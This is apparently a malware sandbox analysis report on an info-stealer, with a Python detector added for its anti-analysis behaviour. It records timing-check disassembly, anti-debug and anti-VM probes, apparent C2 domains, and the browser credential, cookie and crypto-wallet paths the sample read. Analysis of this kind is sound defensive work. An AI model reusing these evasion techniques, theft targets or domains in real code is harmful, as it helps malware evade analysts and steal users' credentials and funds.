            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D075D second address: 47C022B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAD40FC0C5Bh 0x00000008 adc eax, 601D464Eh 0x0000000e jmp 00007FAD40FC0C69h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 retn 0004h 0x0000001a nop 0x0000001b cmp eax, 00000000h 0x0000001e setne al 0x00000021 xor ebx, ebx 0x00000023 test al, 01h 0x00000025 jne 00007FAD40FC0C57h 0x00000027 xor eax, eax 0x00000029 sub esp, 08h 0x0000002c mov dword ptr [esp], 00000000h 0x00000033 mov dword ptr [esp+04h], 00000000h 0x0000003b call 00007FAD44F0A2A5h 0x00000040 mov edi, edi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FAD40FC0C65h 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C022B second address: 47C0290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD40FD6777h 0x00000009 or si, A47Eh 0x0000000e jmp 00007FAD40FD6779h 0x00000013 popfd 0x00000014 jmp 00007FAD40FD6770h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FAD40FD6770h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0290 second address: 47C0296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0296 second address: 47C02AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6772h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C02AC second address: 47C02B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C02B0 second address: 47C030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FAD40FD6777h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FAD40FD6776h 0x00000015 push FFFFFFFEh 0x00000017 jmp 00007FAD40FD6770h 0x0000001c push 34B7A823h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FAD40FD676Ch 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C030D second address: 47C03A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov bx, 5710h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 4171366Bh 0x00000014 jmp 00007FAD40FC0C5Fh 0x00000019 push 0484B409h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FAD40FC0C65h 0x00000025 xor si, D846h 0x0000002a jmp 00007FAD40FC0C61h 0x0000002f popfd 0x00000030 mov cx, 12F7h 0x00000034 popad 0x00000035 xor dword ptr [esp], 71459F79h 0x0000003c jmp 00007FAD40FC0C5Ah 0x00000041 mov eax, dword ptr fs:[00000000h] 0x00000047 pushad 0x00000048 mov cx, EA3Dh 0x0000004c mov dl, ah 0x0000004e popad 0x0000004f push ecx 0x00000050 jmp 00007FAD40FC0C62h 0x00000055 mov dword ptr [esp], eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b mov eax, edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C03A4 second address: 47C03A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C03A9 second address: 47C044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 95h 0x00000005 mov edi, 2245F342h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esp, 18h 0x00000010 pushad 0x00000011 call 00007FAD40FC0C5Fh 0x00000016 pushfd 0x00000017 jmp 00007FAD40FC0C68h 0x0000001c sub si, 5408h 0x00000021 jmp 00007FAD40FC0C5Bh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 call 00007FAD40FC0C69h 0x0000002d jmp 00007FAD40FC0C60h 0x00000032 pop eax 0x00000033 popad 0x00000034 push ebp 0x00000035 jmp 00007FAD40FC0C5Eh 0x0000003a mov dword ptr [esp], ebx 0x0000003d pushad 0x0000003e mov cl, 2Eh 0x00000040 mov al, bh 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FAD40FC0C61h 0x0000004b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C044B second address: 47C055A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, 3822h 0x0000000f mov esi, ebx 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 jmp 00007FAD40FD6775h 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FAD40FD676Ch 0x00000020 sub ecx, 7BE6DFE8h 0x00000026 jmp 00007FAD40FD676Bh 0x0000002b popfd 0x0000002c jmp 00007FAD40FD6778h 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FAD40FD676Bh 0x00000038 xchg eax, edi 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FAD40FD6774h 0x00000040 sbb ax, B4A8h 0x00000045 jmp 00007FAD40FD676Bh 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007FAD40FD6778h 0x00000051 xor ecx, 38C5A708h 0x00000057 jmp 00007FAD40FD676Bh 0x0000005c popfd 0x0000005d popad 0x0000005e mov eax, dword ptr [75C74538h] 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 mov si, di 0x00000069 pushfd 0x0000006a jmp 00007FAD40FD6777h 0x0000006f adc ch, FFFFFFFEh 0x00000072 jmp 00007FAD40FD6779h 0x00000077 popfd 0x00000078 popad 0x00000079 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C055A second address: 47C05B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007FAD40FC0C68h 0x0000000c sbb ax, 9E28h 0x00000011 jmp 00007FAD40FC0C5Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xor dword ptr [ebp-08h], eax 0x0000001d pushad 0x0000001e mov di, si 0x00000021 mov ebx, eax 0x00000023 popad 0x00000024 xor eax, ebp 0x00000026 pushad 0x00000027 mov cx, bx 0x0000002a mov ax, dx 0x0000002d popad 0x0000002e push edx 0x0000002f jmp 00007FAD40FC0C5Ch 0x00000034 mov dword ptr [esp], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C05B7 second address: 47C05BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C05BD second address: 47C05CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C05CC second address: 47C05FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAD40FD676Ah 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C05FB second address: 47C0670 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAD40FC0C62h 0x00000008 add si, 87A8h 0x0000000d jmp 00007FAD40FC0C5Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 call 00007FAD40FC0C61h 0x00000025 call 00007FAD40FC0C60h 0x0000002a pop esi 0x0000002b pop ebx 0x0000002c mov ah, A8h 0x0000002e popad 0x0000002f mov dword ptr [ebp-18h], esp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FAD40FC0C65h 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0670 second address: 47C0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0676 second address: 47C067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C067C second address: 47C06B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000018h] 0x00000011 pushad 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 mov esi, 31560AC5h 0x0000001e popad 0x0000001f mov ecx, dword ptr [eax+00000FDCh] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C06B8 second address: 47C06BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 89EE4E instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 89EF3A instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A38D56 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 89C042 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A6075B instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AC6632 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\file.exe TID: 7516 Thread sleep time: -38019s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 7492 Thread sleep time: -34017s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 7588 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 7496 Thread sleep time: -30015s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 7604 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Adobe
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\3D Objects
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Packages
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub
            Source: file.exe, 00000000.00000002.2087096479.0000000000A18000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000002.2086588158.0000000000689000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.0000000000689000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB]
            Source: file.exe, 00000000.00000002.2086588158.000000000061E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
            Source: file.exe, 00000000.00000002.2086588158.0000000000689000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.0000000000689000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000002.2087096479.0000000000A18000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
            Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
            Source: C:\Users\user\Desktop\file.exe | File opened: SICE
            Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort

            HIPS / PFW / Operating System Protection Evasion

            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: scriptyprefej.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: navygenerayk.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: founpiuer.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: necklacedmny.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: thumbystriw.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: fadehairucw.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: crisiwarny.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: presticitpo.store
            Source: file.exe, 00000000.00000002.2087218688.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: hVProgram Manager
            Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786198846.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.0000000000689000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
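            Taken one at a time, the rows above are weak signals: a HideFromDebugger thread flag, repeated DebugPort queries, FindWindow probes for Sysinternals and OllyDbg window classes, attempts to open the SoftICE devices NTICE/SICE/SIWVID, the VirtualBox ACPI key and module-list check from the sandbox-evasion rows, and the SecurityCenter2 AntiVirusProduct WMI query. What makes them worth alerting on is that one process does all of them. The Python below is an added example, not Joe Sandbox code, that scores an API-monitor trace for exactly those behaviours. The trace layout (one dict per call with the API name and the arguments of interest) and the verdict threshold are assumptions of this example; the information-class constants are the real Windows values, and the window, device and key names are the ones reported above.

```python
"""Score an API-monitor trace for the anti-analysis behaviours seen in the report.

Added example, not Joe Sandbox code. The trace layout (one dict per call,
holding the API name and the arguments of interest) is an assumption; the
information-class constants are the real Windows values.
"""
import re
from collections import Counter

# Real Windows information-class values behind the reported rows.
THREAD_HIDE_FROM_DEBUGGER = 0x11   # THREADINFOCLASS ThreadHideFromDebugger ("HideFromDebugger")
PROCESS_DEBUG_PORT = 0x07          # PROCESSINFOCLASS ProcessDebugPort ("DebugPort")
SYSTEM_MODULE_INFORMATION = 0x0B   # SYSTEM_INFORMATION_CLASS SystemModuleInformation ("ModuleInformation")

# Window titles / class names of analysis tools that the sample looked for.
ANALYSIS_TOOL_WINDOWS = {
    "regmonclass", "gbdyllo", "procmon_window_class", "filemonclass", "ollydbg",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
}
# SoftICE-era kernel-debugger device names the sample tried to open.
DEBUGGER_DEVICES = {"NTICE", "SICE", "SIWVID"}
# VirtualBox ACPI table key read from the registry (the DSDT key is the one in the report).
VBOX_ACPI_KEY = re.compile(r"^HARDWARE\\ACPI\\DSDT\\VBOX__$", re.I)
# Security Center WMI query that enumerates installed AV products.
AV_WMI_QUERY = re.compile(r"\bFROM\s+AntiVirusProduct\b", re.I)


def _device_name(path):
    r"""Strip the \\.\ and \??\ prefixes so that only the bare device name remains."""
    for prefix in ("\\\\.\\", "\\??\\"):
        if path.startswith(prefix):
            path = path[len(prefix):]
    return path.upper()


def classify_event(ev):
    """Map one API call to a technique tag, or None when it is not of interest."""
    api, args = ev["api"], ev.get("args", {})
    if api == "NtSetInformationThread" and args.get("ThreadInformationClass") == THREAD_HIDE_FROM_DEBUGGER:
        return "anti-debug:hide-from-debugger"
    if api == "NtQueryInformationProcess" and args.get("ProcessInformationClass") == PROCESS_DEBUG_PORT:
        return "anti-debug:debug-port"
    if api in ("FindWindowA", "FindWindowW"):
        wanted = {str(args.get(k) or "").lower() for k in ("lpClassName", "lpWindowName")}
        if wanted & ANALYSIS_TOOL_WINDOWS:
            return "anti-debug:tool-window"
    if api in ("NtCreateFile", "CreateFileA", "CreateFileW"):
        if _device_name(str(args.get("FileName", ""))) in DEBUGGER_DEVICES:
            return "anti-debug:debugger-device"
    if api == "NtQuerySystemInformation" and args.get("SystemInformationClass") == SYSTEM_MODULE_INFORMATION:
        return "anti-vm:module-list"      # driver list, used to spot hypervisor / monitor drivers
    if api in ("RegOpenKeyExA", "RegOpenKeyExW", "NtOpenKey") and VBOX_ACPI_KEY.match(str(args.get("SubKey", ""))):
        return "anti-vm:acpi-vbox"
    if api == "IWbemServices::ExecQuery" and AV_WMI_QUERY.search(str(args.get("Query", ""))):
        return "discovery:av-products"
    return None


def score_trace(events):
    """Count technique hits; call the trace anti-analysis when several distinct techniques span two or more families."""
    hits = Counter(tag for tag in map(classify_event, events) if tag)
    families = sorted({tag.split(":")[0] for tag in hits})
    verdict = "anti-analysis" if len(hits) >= 3 and len(families) >= 2 else "inconclusive"
    return {"hits": dict(hits), "families": families, "verdict": verdict}


# Constructed trace mirroring the rows of this report; not a real monitor export.
SAMPLE_TRACE = [
    {"api": "NtSetInformationThread", "args": {"ThreadInformationClass": 0x11}},
    {"api": "FindWindowA", "args": {"lpClassName": "procmon_window_class", "lpWindowName": None}},
    {"api": "FindWindowA", "args": {"lpClassName": None, "lpWindowName": "OllyDbg"}},
    {"api": "CreateFileA", "args": {"FileName": "\\\\.\\SICE"}},
    {"api": "NtQueryInformationProcess", "args": {"ProcessInformationClass": 7}},
    {"api": "NtQueryInformationProcess", "args": {"ProcessInformationClass": 7}},
    {"api": "NtQuerySystemInformation", "args": {"SystemInformationClass": 11}},
    {"api": "RegOpenKeyExA", "args": {"SubKey": "HARDWARE\\ACPI\\DSDT\\VBOX__"}},
    {"api": "IWbemServices::ExecQuery", "args": {"Namespace": "ROOT\\SecurityCenter2", "Query": "SELECT * FROM AntiVirusProduct"}},
    {"api": "CreateFileW", "args": {"FileName": "C:\\Users\\user\\Desktop\\notes.txt"}},  # benign noise
]

if __name__ == "__main__":
    print(score_trace(SAMPLE_TRACE))
```

            The family split matters more than the raw count: a packer alone will set HideFromDebugger and poll DebugPort, and a licensing check alone may read MachineGuid, but a process that also enumerates AV products through WMI and probes for VirtualBox is preparing to decide whether to detonate.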

            Stealing of Sensitive Information

            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: file.exe, 00000000.00000003.1711943208.00000000006F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: file.exe, 00000000.00000003.1711943208.00000000006F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
            Source: file.exe, 00000000.00000003.1711943208.00000000006F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
            Source: file.exe, 00000000.00000003.1711943208.00000000006F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: file.exe, 00000000.00000003.1759504221.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
            Source: file.exe, 00000000.00000003.1759158197.00000000006E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000000.00000003.1759504221.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
